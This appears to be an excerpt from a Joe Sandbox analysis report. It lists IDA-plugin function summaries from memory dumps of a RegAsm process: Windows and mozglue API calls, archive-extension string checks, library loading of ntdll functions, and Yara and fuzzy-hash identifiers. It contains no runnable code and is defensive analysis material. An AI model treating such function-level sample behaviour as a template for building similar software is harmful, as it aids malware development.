Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: DwA$block
API String ID: 3407564107-4170876926
Opcode ID: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
Instruction ID: 9e2abf34b02cddae1b0fa04c6dc88f1d30775994422634f8dc56bb1647053282
Opcode Fuzzy Hash: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
Instruction Fuzzy Hash: 7B414F70A48306BBEB44DF60DC49E9A7B6CFB1870BB206166E402D2151FB39B781DB58

Function 0041B870 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,762283C0,00000000,0041C55B,?), ref: 0041B875
StrCmpCA.SHLWAPI(762283C0,0043613C), ref: 0041B8A3
StrCmpCA.SHLWAPI(762283C0,.zip), ref: 0041B8B3
StrCmpCA.SHLWAPI(762283C0,.zoo), ref: 0041B8BF
StrCmpCA.SHLWAPI(762283C0,.arc), ref: 0041B8CB
StrCmpCA.SHLWAPI(762283C0,.lzh), ref: 0041B8D7
StrCmpCA.SHLWAPI(762283C0,.arj), ref: 0041B8E3
StrCmpCA.SHLWAPI(762283C0,.gz), ref: 0041B8EF
StrCmpCA.SHLWAPI(762283C0,.tgz), ref: 0041B8FB

Strings

.lzh, xrefs: 0041B8D1
.arj, xrefs: 0041B8DD
.gz, xrefs: 0041B8E9
.tgz, xrefs: 0041B8F5
.zoo, xrefs: 0041B8B9
.zip, xrefs: 0041B8AD
.arc, xrefs: 0041B8C5

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction ID: 4d0ab467417de3272ea9e1328912bf8f077e80ad604b43416a02b9711c478325
Opcode Fuzzy Hash: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction Fuzzy Hash: 41015239A89227B56A223631AD81FBF1E5C8D86F807151037E845A2188DB5C998355FD

Function 6C525E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C525E9D

Part of subcall function 6C535B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5356EE,?,00000001), ref: 6C535B85
Part of subcall function 6C535B50: EnterCriticalSection.KERNEL32(6C59F688,?,?,?,6C5356EE,?,00000001), ref: 6C535B90
Part of subcall function 6C535B50: LeaveCriticalSection.KERNEL32(6C59F688,?,?,?,6C5356EE,?,00000001), ref: 6C535BD8
Part of subcall function 6C535B50: GetTickCount64.KERNEL32 ref: 6C535BE4

GetCurrentThreadId.KERNEL32 ref: 6C525EAB
GetCurrentThreadId.KERNEL32 ref: 6C525EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C525ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C526017

Part of subcall function 6C514310: moz_xmalloc.MOZGLUE(00000010,?,6C5142D2), ref: 6C51436A
Part of subcall function 6C514310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C5142D2), ref: 6C514387

moz_xmalloc.MOZGLUE(00000004), ref: 6C525F47
GetCurrentProcess.KERNEL32 ref: 6C525F53
GetCurrentThread.KERNEL32 ref: 6C525F5C
GetCurrentProcess.KERNEL32 ref: 6C525F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C525F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C525F27

Part of subcall function 6C52CA10: mozalloc_abort.MOZGLUE(?), ref: 6C52CAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5255E1), ref: 6C525E8C

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5255E1), ref: 6C52605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5255E1), ref: 6C5260CC

Strings

GeckoMain, xrefs: 6C525ECE, 6C526015

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: 4f38ec9a490d592a6bdff4cc1e92e4b8c0a6f4197ab85c1ae87b9078bb47dc44
Instruction ID: 6683332779b8f24db0724e5cc9a7acca3c88e165e1011492cb5a4f4ec2eb0118
Opcode Fuzzy Hash: 4f38ec9a490d592a6bdff4cc1e92e4b8c0a6f4197ab85c1ae87b9078bb47dc44
Instruction Fuzzy Hash: 0171E5B0605780DFD710DF25C880A6ABBF0FF89304F55496DE58A87B92DB74E848CB92

Function 6C529590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5131C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C513217
Part of subcall function 6C5131C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C513236
Part of subcall function 6C5131C0: FreeLibrary.KERNEL32 ref: 6C51324B
Part of subcall function 6C5131C0: __Init_thread_footer.LIBCMT ref: 6C513260
Part of subcall function 6C5131C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C51327F
Part of subcall function 6C5131C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C51328E
Part of subcall function 6C5131C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5132AB
Part of subcall function 6C5131C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5132D1
Part of subcall function 6C5131C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C5132E5
Part of subcall function 6C5131C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C5132F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C529675
__Init_thread_footer.LIBCMT ref: 6C529697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C5296E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C529707
__Init_thread_footer.LIBCMT ref: 6C52971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C529773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C5297B7
FreeLibrary.KERNEL32 ref: 6C5297D0
FreeLibrary.KERNEL32 ref: 6C5297EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C529824

Strings

NtMapViewOfSection, xrefs: 6C529701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C529670
MapViewOfFileNuma2, xrefs: 6C5297B1
ntdll.dll, xrefs: 6C5296E3

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 84d7d6520afa07a4835248bb0d6773ea7da05ac2fc36935f34b574a3ffe3266f
Instruction ID: 65736c135b7413ecb284ddbdac8ba0d6192c3b50e7e55ef38ace09b1472bbbb0
Opcode Fuzzy Hash: 84d7d6520afa07a4835248bb0d6773ea7da05ac2fc36935f34b574a3ffe3266f
Instruction Fuzzy Hash: 5F61F070700281DBEF00DFA5DD84B9A7BF4EB8A314F1786A9F95683780D734A854CB95

Function 6C5211B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C521213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C521285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C5212B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C521327

Strings

CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C52131B
TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C5212AD
Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C52120D
MZx, xrefs: 6C5211E1
&, xrefs: 6C52126B

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: e1141f99c4df563bd89609587e6a1ceef21d6d1be90e3831f5a464a8b6b99f6d
Instruction ID: 7b09f7da1d1c4b3d0a0a32ca72f2cbbec6b77489d64b96b3d231c514effe3798
Opcode Fuzzy Hash: e1141f99c4df563bd89609587e6a1ceef21d6d1be90e3831f5a464a8b6b99f6d
Instruction Fuzzy Hash: 2C719271A05354CADB209F64CC007DFB7F6BF95309F05065AD549A3B80EB79AE88CB92

Function 6C5131C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C513217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C513236
FreeLibrary.KERNEL32 ref: 6C51324B
__Init_thread_footer.LIBCMT ref: 6C513260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C51327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C51328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5132AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5132D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C5132E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C5132F7

Part of subcall function 6C54AB89: EnterCriticalSection.KERNEL32(6C59E370,?,?,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284), ref: 6C54AB94
Part of subcall function 6C54AB89: LeaveCriticalSection.KERNEL32(6C59E370,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C54ABD1

__aulldiv.LIBCMT ref: 6C51346B

Strings

KernelBase.dll, xrefs: 6C513212
QueryInterruptTime, xrefs: 6C513230

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: f4cf776feef9ea56872742c663dc3aed089b3c3b479a06913d4ae8a71e6a3164
Instruction ID: 7aa7b6d60de4b5e1dee6e25da00bd81877d747ffcf653380eaacee519b78c5bc
Opcode Fuzzy Hash: f4cf776feef9ea56872742c663dc3aed089b3c3b479a06913d4ae8a71e6a3164
Instruction Fuzzy Hash: FB61FF71A087418BD711CF39CC5465AB3F4BFC6394F228B1EF8A5A3690EB7099498B46

Function 6C576660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C59F618), ref: 6C576694
GetThreadId.KERNEL32(?), ref: 6C5766B1
GetCurrentThreadId.KERNEL32 ref: 6C5766B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C5766E1
EnterCriticalSection.KERNEL32(6C59F618), ref: 6C576734
GetCurrentProcess.KERNEL32 ref: 6C57673A
LeaveCriticalSection.KERNEL32(6C59F618), ref: 6C57676C
GetCurrentThread.KERNEL32 ref: 6C5767FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C576868
RtlCaptureContext.NTDLL ref: 6C57687F

Strings

WalkStack64, xrefs: 6C576890

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 5c2ccc4923916a08248a7eda9db3687cd89e8362c70bf124077bae1b6c12f1e0
Instruction ID: f5ab65e9e912bef1ff1095d97bd68cd40a4f5665e9d0bcb684aac8b769bcc266
Opcode Fuzzy Hash: 5c2ccc4923916a08248a7eda9db3687cd89e8362c70bf124077bae1b6c12f1e0
Instruction Fuzzy Hash: FA51DC71A09340AFDB21DF25CC44B5ABBF4FF89714F01892DF59997640DB74E8488BA2

Function 6C55DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C55DE73
GetCurrentThreadId.KERNEL32 ref: 6C55DF7D
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55DF8A
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55DFC9
GetCurrentThreadId.KERNEL32 ref: 6C55DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C55E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C524A68), ref: 6C55DE7B

Part of subcall function 6C5594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5594EE
Part of subcall function 6C5594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C559508

Part of subcall function 6C54CBE8: GetCurrentProcess.KERNEL32(?,6C5131A7), ref: 6C54CBF1
Part of subcall function 6C54CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5131A7), ref: 6C54CBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C524A68), ref: 6C55DEB8
free.MOZGLUE(00000000,?,6C524A68), ref: 6C55DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C55DF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6C55DE83
<none>, xrefs: 6C55DFD7
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C55E00E

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: d340466a65e926a280adcc789978240195949b4ce5293750d3639b40ec4d9577
Instruction ID: a97a44496bd8af93f07b48b6679c25615055bd8cf396a5cf1610a8d29a7d2e3b
Opcode Fuzzy Hash: d340466a65e926a280adcc789978240195949b4ce5293750d3639b40ec4d9577
Instruction Fuzzy Hash: 1441F472701250DBEB109F64DD047AA7775EF8230CF960156E90987B01DB71AC25CBEA

Function 6C56D840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C56D85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C56D86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C56D918
GetCurrentThreadId.KERNEL32 ref: 6C56D93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C56D948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C56D970
GetCurrentThreadId.KERNEL32 ref: 6C56D976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C56D982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C56D9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C56DA2E
GetCurrentThreadId.KERNEL32 ref: 6C56DA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C56DA78
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6C56DA91

Part of subcall function 6C535C50: GetTickCount64.KERNEL32 ref: 6C535D40
Part of subcall function 6C535C50: EnterCriticalSection.KERNEL32(6C59F688), ref: 6C535D67

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C56DAB7

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
String ID:
API String ID: 1195625958-0
Opcode ID: 07f108c0c4981c19fe7d757df1cd2ee8793b39fd38861119193095097d14af77
Instruction ID: d5991599d19e40c430b04cc510dd18b80bf3b4954f8eb93ad12b974bfaccc924
Opcode Fuzzy Hash: 07f108c0c4981c19fe7d757df1cd2ee8793b39fd38861119193095097d14af77
Instruction Fuzzy Hash: 94719E35604304DFCB00DF2AC884B9ABBF5FF89314F16856EE85A9B751DB30A944CB95

Function 6C56D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C56D4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C56D4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C56D52A
GetCurrentThreadId.KERNEL32 ref: 6C56D530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C56D53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C56D55F
free.MOZGLUE(00000000), ref: 6C56D585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C56D5D3
GetCurrentThreadId.KERNEL32 ref: 6C56D5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C56D605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C56D652
GetCurrentThreadId.KERNEL32 ref: 6C56D658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C56D667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C56D6A2

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 53169cd2a960b758b430c821ea8600eebe0c76d07724f07ee90c50b6ad62e644
Instruction ID: 3f1b7d4ad27629014b0e083fb94111273ba367325788691465fa2a69661fa1e1
Opcode Fuzzy Hash: 53169cd2a960b758b430c821ea8600eebe0c76d07724f07ee90c50b6ad62e644
Instruction Fuzzy Hash: F0519F71604745DFD704DF35C884A9ABBF4FF89318F118A6EE84A87B21EB30A944CB95

Function 6C511E90 Relevance: 19.6, APIs: 9, Strings: 4, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C59E784), ref: 6C511EC1
LeaveCriticalSection.KERNEL32(6C59E784), ref: 6C511EE1
EnterCriticalSection.KERNEL32(6C59E744), ref: 6C511F38
LeaveCriticalSection.KERNEL32(6C59E744), ref: 6C511F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C511F83
LeaveCriticalSection.KERNEL32(6C59E784), ref: 6C511FC0
EnterCriticalSection.KERNEL32(6C59E784), ref: 6C511FE2
LeaveCriticalSection.KERNEL32(6C59E784), ref: 6C511FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C512019

Strings

\Yl, xrefs: 6C511F3E
DYl, xrefs: 6C511F32
DYl, xrefs: 6C511F56
MOZ_CRASH(), xrefs: 6C512000

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: DYl$DYl$MOZ_CRASH()$\Yl
API String ID: 2055633661-3951999336
Opcode ID: 0410991184394c7a957b46516146c049eb03afcb56575acdce73c8e7df1b7544
Instruction ID: ea55be90d15e75134bc9a9e0499e944c1ed1095b6de569c1da3386cd0e9604bc
Opcode Fuzzy Hash: 0410991184394c7a957b46516146c049eb03afcb56575acdce73c8e7df1b7544
Instruction Fuzzy Hash: DF41F471B043958FEF109F69CC88B6B36B5FB5A348F0201A5E90597B40D7B19804CBDA

Function 6C535670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C5356D1
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5356E9
?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C5356F1
